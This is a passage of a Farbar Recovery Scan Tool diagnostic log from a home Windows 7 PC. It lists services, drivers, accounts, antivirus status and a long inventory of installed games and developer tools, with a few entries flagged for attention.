R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [6889232 2015-12-14] (TeamViewer GmbH)
S2 Telenor Internet. RunOuc; C:\Program Files\Telenor Internet\UpdateDog\ouc.exe [246112 2011-12-19] ()
R2 TunnelBearMaintenance; C:\Program Files\TunnelBear\TBear.Maintenance.exe [41472 2016-05-11] ()
S3 VsEtwService120; C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [73360 2014-07-23] (Microsoft Corporation)
S3 VSStandardCollectorService140; C:\Program Files\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [48872 2016-03-22] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)
S2 Amsp; "C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe" coreFrameworkHost.exe -m=rb -dt=60000 [X]
S2 HWDeviceService.exe; "C:\ProgramData\DatacardService\HWDeviceService.exe" -/service [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BroadcomWModem; C:\Windows\System32\DRIVERS\bcmww.sys [118400 2005-06-02] (Broadcom Corporation)
R3 EvolveVirtualAdapter; C:\Windows\System32\DRIVERS\evolve.sys [18584 2013-06-12] (Echobit, LLC)
R3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [27040 2015-11-12] (LogMeIn, Inc.)
R2 IntelHaxm; C:\Windows\System32\DRIVERS\IntelHaxm.sys [78848 2015-01-30] (Intel Corporation)
R1 ISODrive; C:\Program Files\UltraISO\drivers\ISODrive.sys [82320 2010-01-29] (EZB Systems, Inc.)
S3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [22856 2013-04-04] (Malwarebytes Corporation)
U0 Partizan; C:\Windows\System32\drivers\Partizan.sys [40304 2016-03-12] (Greatis Software)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [20288 2015-06-12] (Razer, Inc.)
S4 secdrv; C:\Windows\system32\Drivers\secdrv.sys [12528 2015-11-07] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [File not signed]
S0 sfdrv01; C:\Windows\System32\drivers\sfdrv01.sys [50176 2005-05-17] (Protection Technology) [File not signed]
R0 sfhlp02; C:\Windows\System32\drivers\sfhlp02.sys [6656 2005-05-16] (Protection Technology) [File not signed]
S0 sfsync02; C:\Windows\System32\drivers\sfsync02.sys [19968 2005-05-16] (Protection Technology) [File not signed]
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [721904 2013-07-31] () [File not signed]
R3 tap-tb-0901; C:\Windows\System32\DRIVERS\tap-tb-0901.sys [33280 2015-08-10] (The OpenVPN Project)
R3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [26624 2011-12-15] (The OpenVPN Project)
R2 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [80464 2012-01-06] (Trend Micro Inc.)
R2 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [189520 2012-01-06] (Trend Micro Inc.)
R2 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [64080 2012-01-06] (Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [92112 2012-01-06] (Trend Micro Inc.)
R3 XSplit_Dummy; C:\Windows\System32\drivers\xspltspk.sys [22104 2014-07-02] (SplitmediaLabs Limited)
R3 zttap200; C:\Windows\System32\DRIVERS\zttap200.sys [28824 2014-03-05] ()
U3 am2liese; C:\Windows\system32\Drivers\am2liese.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
S3 EagleXNt; \??\C:\Windows\system32\drivers\EagleXNt.sys [X]
S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X]
S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X]
S3 TuneUpUtilitiesDrv; \??\C:\Program Files\TuneUp Utilities 2013\TuneUpUtilitiesDriver32.sys [X]
S3 vtany; \??\C:\Windows\vtany.sys [X]
S3 XDva397; \??\C:\Windows\system32\XDva397.sys [X]
S3 XDva410; \??\C:\Windows\system32\XDva410.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)






the addition.txt file:
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 13-10-2016
Ran by violeta (14-10-2016 22:20:43)
Running from C:\Users\violeta\Desktop
Microsoft Windows 7 Professional Service Pack 1 (X86) (2011-12-18 15:08:34)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3268508096-794200350-1188608446-500 - Administrator - Disabled)
ASPNET (S-1-5-21-3268508096-794200350-1188608446-1004 - Limited - Enabled)
Guest (S-1-5-21-3268508096-794200350-1188608446-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3268508096-794200350-1188608446-1002 - Limited - Enabled)
violeta (S-1-5-21-3268508096-794200350-1188608446-1000 - Administrator - Enabled) => C:\Users\violeta

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Titanium Internet Security (Disabled - Out of date) {68F968AC-2AA0-091D-848C-803E83E35902}
AS: Trend Micro Titanium Internet Security (Disabled - Out of date) {D3988948-0C9A-0693-BE3C-BB4CF86413BF}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM\...\Adobe AIR) (Version: 18.0.0.180 - Adobe Systems Incorporated)
Adobe Flash CS4 Professional (HKLM\...\Adobe_a68eec966ce913ddaa63251dc82ed31) (Version: 10.0 - Adobe Systems Incorporated)
Adobe Flash Player 23 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 23.0.0.162 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 23.0.0.162 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Media Player (HKLM\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1 - Adobe Systems Incorporated)
Adobe Photoshop CS4 (HKLM\...\Adobe_faf656ef605427ee2f42989c3ad31b8) (Version: 11.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM\...\Adobe Shockwave Player) (Version: 12.1.3.153 - Adobe Systems, Inc.)
AirDroid 3.1.3.0 (HKLM\...\AirDroid) (Version: 3.1.3.0 - Sand Studio)
Android Studio (HKLM\...\Android Studio) (Version: 1.0 - Google Inc.)
Application Insights Tools for Visual Studio 2013 (Version: 2.1 - Microsoft Corporation) Hidden
Application Insights Tools for Visual Studio 2015 (HKLM\...\{981F324E-98F4-4784-B76F-04E92039F3F6}) (Version: 5.2.60328.3 - Microsoft Corporation)
Archeblade (HKLM\...\Steam App 207230) (Version: - )
Assassin's Creed II (HKLM\...\{8570BEE8-0CA3-4977-9AB1-80ED93F0513C}) (Version: 1.01 - Ubisoft)
Autodesk SketchBook (HKLM\...\{C0D41025-EDBF-4354-A5BA-86B27A78BC25}) (Version: 8.00.0001 - Autodesk)
Awesomenauts (HKLM\...\Steam App 204300) (Version: - Ronimo Games)
Azure AD Authentication Connected Service (Version: 14.0.23107 - Microsoft Corporation) Hidden
AzureTools.Notifications (Version: 2.1.10731.1602 - Microsoft Corporation) Hidden
AzureTools.Notifications (Version: 2.7.30611.1601 - Microsoft Corporation) Hidden
Bandisoft MPEG-1 Decoder (HKLM\...\BandiMPEG1) (Version: - Bandisoft.com)
Battle.net (HKLM\...\Battle.net) (Version: - Blizzard Entertainment)
Behaviors SDK (Windows Phone) for Visual Studio 2013 (Version: 12.0.50716.0 - Microsoft Corporation) Hidden
Behaviors SDK (Windows) for Visual Studio 2013 (Version: 12.0.50429.0 - Microsoft Corporation) Hidden
Bejeweled® 3 (HKLM\...\{E99C27B2-EB2E-4244-9F5C-A96F55100F0C}) (Version: 1.1.13.4753 - Electronic Arts, Inc.)
Bing Bar (HKLM\...\{16793295-2366-40F7-A045-A3E42A81365E}) (Version: 7.1.362.0 - Microsoft Corporation)
Blend for Visual Studio 2013 (Version: 12.0.41002.1 - Microsoft Corporation) Hidden
Blend for Visual Studio 2013 ENU resources (Version: 12.0.41002.1 - Microsoft Corporation) Hidden
Blend for Visual Studio SDK for .NET 4.5 (Version: 3.0.40218.0 - Microsoft Corporation) Hidden
Blend for Visual Studio SDK for Silverlight 5 (Version: 3.0.40218.0 - Microsoft Corporation) Hidden
Blocks That Matter Demo (HKLM\...\Steam App 200570) (Version: - Swing Swing Submarine)
Bonjour (HKLM\...\{07287123-B8AC-41CE-8346-3D777245C35B}) (Version: 1.0.106 - Apple Inc.)
Brawlhalla (HKLM\...\Steam App 291550) (Version: - Blue Mammoth Games)
Brick-Force (EU) (HKLM\...\Steam App 335330) (Version: - Exe Games Inc.)
BS.Player FREE (HKLM\...\BSPlayerf) (Version: 2.57.1051 - Webteh, d.o.o.)
Build Tools - x86 (Version: 12.0.30723 - Microsoft Corporation) Hidden
Build Tools Language Resources - x86 (Version: 12.0.30723 - Microsoft Corporation) Hidden
Buzz Lightyear of Star Command (HKLM\...\Buzz Lightyear of Star Command) (Version: - )
CamStudio 2.7.4 (HKLM\...\{04B83666-3A62-452B-85D3-70F8117F2329}_is1) (Version: 2.7.4 - CamStudio Open Source)
Camtasia Studio 7 (HKLM\...\{53FA9A9F-3C19-4D43-AD6B-DEF365D469BA}) (Version: 7.0.0 - TechSmith Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 5.17 - Piriform)
City of Heroes (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\NCsoft-CityOfHeroes) (Version: - NCsoft)
Clicker Heroes (HKLM\...\Steam App 363970) (Version: - Playsaurus)
CodeBlocks (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\CodeBlocks) (Version: 13.12 - The Code::Blocks Team)
Command & Conquer Generals (HKLM\...\InstallShield_{06F80017-8F98-4C94-B868-52358569FC32}) (Version: 0.50.0000 - Electronic Arts)
Command & Conquer Generals (Version: 0.50.0000 - Electronic Arts) Hidden
Command and ConquerTM Generals Zero Hour (HKLM\...\InstallShield_{F3E9C243-122E-4D6B-ACC1-E1FEC02F6CA1}) (Version: 1.00.0000 - Electronic Arts)
Command and ConquerTM Generals Zero Hour (Version: 1.00.0000 - Electronic Arts) Hidden
Connect (Version: 1.0.0.1 - Adobe Systems Incorporated) Hidden
Contextual Tool Yourprofitclub (HKLM\...\6bc9c203) (Version: - ) <==== ATTENTION
Counter-Strike 1.6 (HKLM\...\Counter-Strike 1.6) (Version: 1.6 - Valve)
CuteFTP 9 (HKLM\...\{89B9E358-75C6-4C6B-BD38-803FF156CC4B}) (Version: 9.0.0 - Globalscape)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Day of Defeat Source version 3398447 (HKLM\...\{A3CC13B7-6A0B-457C-B9C9-F1F2D20F5429}_is1) (Version: 3398447 - Strogino CS Portal)
Democracy 3 - Africa (HKLM\...\1459868439_is1) (Version: 2.2.0.3 - GOG.com)
Democracy 3 (HKLM\...\1207659953_is1) (Version: 2.10.0.16 - GOG.com)
Dotfuscator and Analytics Community Edition (Version: 5.5.4954.46574 - PreEmptive Solutions) Hidden
Dotfuscator and Analytics Community Edition 5.19.1 (Version: 5.19.1.3091 - PreEmptive Solutions) Hidden
Duelyst (HKLM\...\Steam App 291410) (Version: - Counterplay Games Inc.)
Dungeon Crawl Stone Soup (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Crawl) (Version: 0.14.1 - )
Dungeon Keeper 2 (HKLM\...\GOGPACKDUNGEONKEEPER2_is1) (Version: 2.0.0.32 - GOG.com)
Dungeon Party (HKLM\...\Steam App 215870) (Version: - )
Dungeonland (HKLM\...\Steam App 218130) (Version: - Critical Studio)
Elsword version v6.0824.5.2 (HKLM\...\{E655DDFC-24DB-4FC3-8474-271E911309B4}_is1) (Version: v6.0824.5.2 - KOGGAMES)
Entity Framework 6.1.1 Tools for Visual Studio 2013 (HKLM\...\{85253F13-EE42-4850-A3A5-79B90E92D7AC}) (Version: 12.0.30610.0 - Microsoft Corporation)
Europa Universalis III (HKLM\...\{59C80C5E-8C92-40FF-B910-2BB5C7281F61}) (Version: - )
Evolve (HKLM\...\{670B1B49-9FD3-4827-9B41-471EFF580AA8}) (Version: 1.8.18 - Echobit, LLC)
Far Cry (HKLM\...\InstallShield_{D6DBDC2A-E72C-4284-B6AD-6B3B61B4DABC}) (Version: 1.00.0000 - Ubisoft)
Far Cry (Patch 1.4) (Version: 1.00.0000 - Ubisoft) Hidden
Far Cry (Version: 1.00.0000 - Ubisoft) Hidden
FeralHeart version 1.13 (HKLM\...\{EAD29228-1A50-4178-B1EA-E1D83FC691F0}_is1) (Version: 1.13 - Kovuworks)
FireArc Arcade (HKLM\...\{3D25A35C-55FC-4A4C-8C94-A08DFB0C565F}) (Version: 0.5.17 - FireArc.com)
Foxit Reader (HKLM\...\Foxit Reader_is1) (Version: 5.4.2.901 - Foxit Corporation)
Fraps (remove only) (HKLM\...\Fraps) (Version: - )
Freemake Video Converter version 4.1.7 (HKLM\...\Freemake Video Converter_is1) (Version: 4.1.7 - Ellora Assets Corporation)
Game Maker 8.0 (HKLM\...\Game Maker 8.0) (Version: - )
GarrysMod - FuzeRip (HKLM\...\GmodFuzeRipNoSteam) (Version: - Fuze_man)
GOG.com Dungeon Keeper 2 (HKLM\...\{b6462b67-caf5-4a74-99df-cc2811bd1957}.sdb) (Version: - )
Google Earth Plug-in (HKLM\...\{57BB4801-61C8-4E74-9672-2160728A461E}) (Version: 7.1.5.1557 - Google)
Google Update Helper (Version: 1.3.31.5 - Google Inc.) Hidden
Gotham City Impostors: Free To Play (HKLM\...\Steam App 206210) (Version: - )
Gtk# for .Net 2.12.26 (HKLM\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
Guitar Hero III (HKLM\...\{0CE1A6C0-F3F7-49E6-8F9D-2431F9827441}) (Version: 1.3 - Aspyr)
Guitar Hero Three Control Panel (HKLM\...\{FC7CCCFB-2081-4E9D-8F6D-CAAE87267E6C}) (Version: 2.0.4 - Sigma Production Inc.)
Half-Life Dedicated Server (HKLM\...\Steam App 90) (Version: - )
Happy Cloud Client (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\HappyCloud) (Version: 4.54 - Happy Cloud, Inc.)
Hearthstone (HKLM\...\Hearthstone) (Version: - Blizzard Entertainment)
Heroes & Generals (HKLM\...\Heroes & Generals) (Version: 1.0.6.1 - Reto-Moto)
Heroes of Might and Magic 3 Complete (HKLM\...\Heroes of Might and Magic 3 Complete_is1) (Version: - GOG.com)
Heroes of Might and Magic V Bundle (HKLM\...\Heroes of Might and Magic V Bundle_is1) (Version: - GOG.com)
HiPatch (HKLM\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.6.4 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Hitman Blood Money version 1.2.0.0 (HKLM\...\Hitman Blood Money_is1) (Version: 1.2.0.0 - Mr DJ)
Hunger Dungeon (HKLM\...\Steam App 513560) (Version: - Buka Game Studio)
IIS 8.0 Express (HKLM\...\{B8FFB7D6-6ABD-47C3-8BAD-86FF5D8F3EDC}) (Version: 8.0.1557 - Microsoft Corporation)
IIS Express Application Compatibility Database for x86 (HKLM\...\{fdfba1f3-74ae-4255-9c10-a0f552b4610f}.sdb) (Version: - )
ImgBurn (HKLM\...\ImgBurn) (Version: 2.5.8.0 - LIGHTNING UK!)
Intel Driver Update Utility (HKLM\...\{45076b94-d6e6-41ae-abd0-609e78177aee}) (Version: 2.1.0.17 - Intel)
Intel XDK (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\ARP_for_prd_xdk_0.0.3357) (Version: 0.0.3357 - Intel Corporation)
Intel(R) Control Center (HKLM\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2869 - Intel Corporation)
Intel® Hardware Accelerated Execution Manager (HKLM\...\{ECCB31F5-435D-4F37-A98D-5854D3C62718}) (Version: 1.1.1 - Intel Corporation)
ioquake3 (HKLM\...\ioquake3) (Version: - )
Java 8 Update 45 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
Java 8 Update 91 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.15 - Oracle Corporation)
Java SE Development Kit 8 Update 40 (HKLM\...\{32A3A4F4-B792-11D6-A78A-00B0D0180400}) (Version: 8.0.400.26 - Oracle Corporation)
Junk Mail filter update (Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Kit SDK de vérification de Visual Studio 2012 - fra (Version: 12.0.30501 - Microsoft Corporation) Hidden
K-Lite Codec Pack 8.7.0 (Basic) (HKLM\...\KLiteCodecPack_is1) (Version: 8.7.0 - )
kuler (Version: 2.0 - Adobe Systems Incorporated) Hidden
Lightshot-5.4.0.1 (HKLM\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.1 - Skillbrains)
Loadout (HKLM\...\Steam App 208090) (Version: - Edge of Reality)
LocalESPC (Version: 8.59.29989 - Microsoft Corporation) Hidden
LocalESPC Dev12 (Version: 8.100.25984 - Microsoft Corporation) Hidden
LocalESPCui for en-us Dev12 (Version: 8.100.25984 - Microsoft) Hidden
LogMeIn Hamachi (HKLM\...\LogMeIn Hamachi) (Version: 2.2.0.519 - LogMeIn, Inc.)
LogMeIn Hamachi (Version: 2.2.0.519 - LogMeIn, Inc.) Hidden
Magicite version 1.3 (HKLM\...\Magicite_is1) (Version: 1.3 - GMT-MAX.ORG)
Managed DirectX (0901) (Version: 4.09.00.0901 - Microsoft) Hidden
Marvel Heroes (HKLM\...\Steam App 226320) (Version: - )
Memory Profiler (Version: 12.0.30723 - Microsoft Corporation) Hidden
MFC RunTime files (Version: 1.0.0 - Extensoft) Hidden
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1 (1033)) (Version: - )
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5 SDK (HKLM\...\{4AE57014-05C4-4864-A13D-86517A7E1BA4}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (ENU) (HKLM\...\{D3517C62-68A5-37CF-92F7-93C029A89681}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (HKLM\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (ENU) (HKLM\...\{290FC320-2F5A-329E-8840-C4193BD7A9EE}) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM\...\{19E8AE59-4D4A-3534-B567-6CC08FA4102E}) (Version: 4.5.51651 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (HKLM\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (ENU) (HKLM\...\{034547E9-D8FA-49E7-8B9C-4C9861FB9146}) (Version: 4.6.00127 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (HKLM\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (HKLM\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Help Viewer 2.1 (HKLM\...\Microsoft Help Viewer 2.1) (Version: 2.1.21005 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM\...\Microsoft Help Viewer 2.2) (Version: 2.2.25123 - Microsoft Corporation)
Microsoft Office 2003 programski dodatak za preslovljavanje (HKLM\...\{51312349-0B4D-450E-AFAA-03CC28A9531F}) (Version: 1.0.0527.0 - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM\...\{95140000-007A-0409-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Silverlight 5 SDK (HKLM\...\{E1FBB3D4-ADB0-4949-B101-855DA061C735}) (Version: 5.0.61118.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\SkyDriveSetup.exe) (Version: 16.4.6010.0727 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2012 Command Line Utilities (HKLM\...\{5EF1EBC5-4A40-4D1C-B02E-0C54BC93FD06}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Data-Tier App Framework (HKLM\...\{1B876496-B3A2-4D22-9B12-B608A3FD4B8B}) (Version: 11.1.2902.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB (HKLM\...\{FE939060-416C-4ECD-890E-13776E2707C4}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects (HKLM\...\{2F7DBBE6-8EBC-495C-9041-46A772F4E311}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client (HKLM\...\{544ACD54-9FAA-4A60-A1E7-B2EC3AA75D24}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom (HKLM\...\{E7654811-38F9-4225-9688-827FDA716582}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 T-SQL Language Service (HKLM\...\{04DD7AF4-A6D3-4E30-9BB9-3B3670719234}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects (HKLM\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom (HKLM\...\{C340BAB2-9A21-41B9-A465-7AC7B1DF773E}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service (HKLM\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 Design Tools ENU (HKLM\...\{2E5C075E-11AB-4BDD-918C-7B9A68953FF8}) (Version: 3.5.5386.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 ENU (HKLM\...\{BCC899FE-2DAA-460C-A5FB-60291E73D9C3}) (Version: 3.5.5386.0 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 ENU (HKLM\...\{773AC1E4-5F27-4DF6-A932-7FDDE35C069D}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Data Tools - enu (12.0.30919.1) (HKLM\...\{0D7FCBFB-F478-4D32-901C-83F0BF5A3501}) (Version: 12.0.30919.1 - Microsoft Corporation)
Microsoft SQL Server Data Tools Build Utilities - enu (12.0.30919.1) (HKLM\...\{6781FF9B-E87D-4A03-9373-A55A288B83FA}) (Version: 12.0.30919.1 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM\...\{A47FD1BF-A815-4A76-BE65-53A15BD5D25D}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (HKLM\...\{070C38AC-05CE-43DF-9A20-141332F6AB2B}) (Version: 11.1.3366.16 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{091CE6AA-2753-4F6E-AD1C-0E875744EB54}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft Visual Basic 2008 Express Edition - ENU (HKLM\...\Microsoft Visual Basic 2008 Express Edition - ENU) (Version: - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x86) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x86)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2015 Tools for Unity (HKLM\...\{D68E6605-F852-4936-AB64-04B80E0C85AD}) (Version: 2.2.0.0 - Microsoft Corporation)
Microsoft Visual Studio Community 2015 with Update 2 (HKLM\...\{04fa3a35-1f49-4510-8051-819cdc1e6e01}) (Version: 14.0.25123.0 - Microsoft Corporation)
